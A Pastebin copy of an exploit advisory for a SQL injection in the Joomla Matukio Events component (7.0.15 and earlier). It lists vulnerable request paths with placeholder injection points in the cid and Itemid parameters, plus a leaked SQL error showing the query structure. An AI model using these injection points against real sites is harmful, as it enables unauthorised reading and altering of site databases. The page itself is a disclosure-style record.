Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Matukio Events Components 7.0.15 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 25/02/2019
- # Vendor Homepage : compojoom.com
- # Software Download Link : matukio.compojoom.com
- # Software Information Link : extensions.joomla.org/extension/matukio-events/
- compojoom.com/joomla-extensions/matukio-events-management-made-easy
- # Software Version : 7.0.15 and previous versions
- # Software Price : Paid Download
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Matukio Events - The all in one events and webinar solution for Joomla.
- From event management and presentation, over flexible booking forms, till payment processing!
- ####################################################################
- # Impact :
- ***********
- Joomla Matukio Events Components 7.0.15 [ and other versions ] component for Joomla is
- prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query. Exploiting this issue could allow an attacker
- to compromise the application, access or modify data, or exploit latent vulnerabilities
- in the underlying database. A remote attacker can send a specially crafted request
- to the vulnerable application and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?tmpl=component&option=com_matukio&view=ics&format=raw
- /index.php/en/?option=com_matukio&view=ics&format=raw
- /index.php?option=com_matukio&view=participantlist&cid=[SQL Injection]
- /index.php?option=com_matukio&view=calendar&Itemid=[SQL Injection]
- /index.php?option=com_matukio&view=participantlist&cid=[ID-NUMBER]&Itemid=[SQL Injection]
- ####################################################################
- # Example SQL Database Error :
- ****************************
- #1064 You have an error in your SQL syntax; check the manual that corresponds
- to your MySQL server version for the right syntax to use near 'cur.id as curid,
- cur.title as curtitle, cur.sign as currencySign, cur.posi' at line 2 SQL=SELECT
- a.*, r.*, cat.title AS category cur.id as curid, cur.title as curtitle, cur.sign as currencySign,
- cur.position as currencyPosition, cur.decimalsign as decimalSign, cur.payment_
- code as payment_code, IF(r.override_title IS NULL or r.override_title =
- '', a.title, r.override_title) as title, IF(r.override_maxpupil IS NULL or r.override_maxpupil
- = '', a.maxpupil, r.override_maxpupil) as maxpupil FROM #__matukio_recurring
- AS r LEFT JOIN #__matukio AS a ON r.event_id = a.id LEFT JOIN
- #__categories AS cat ON cat.id = a.catid LEFT JOIN #__matukio_currencies AS
- cur ON cur.id = a.currency_id WHERE r.published = '1' AND r.end >
- '' AND r.booked > '' AND cat.access IN (1,1) ORDER BY r.begin DESC LIMIT 0, 1000
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment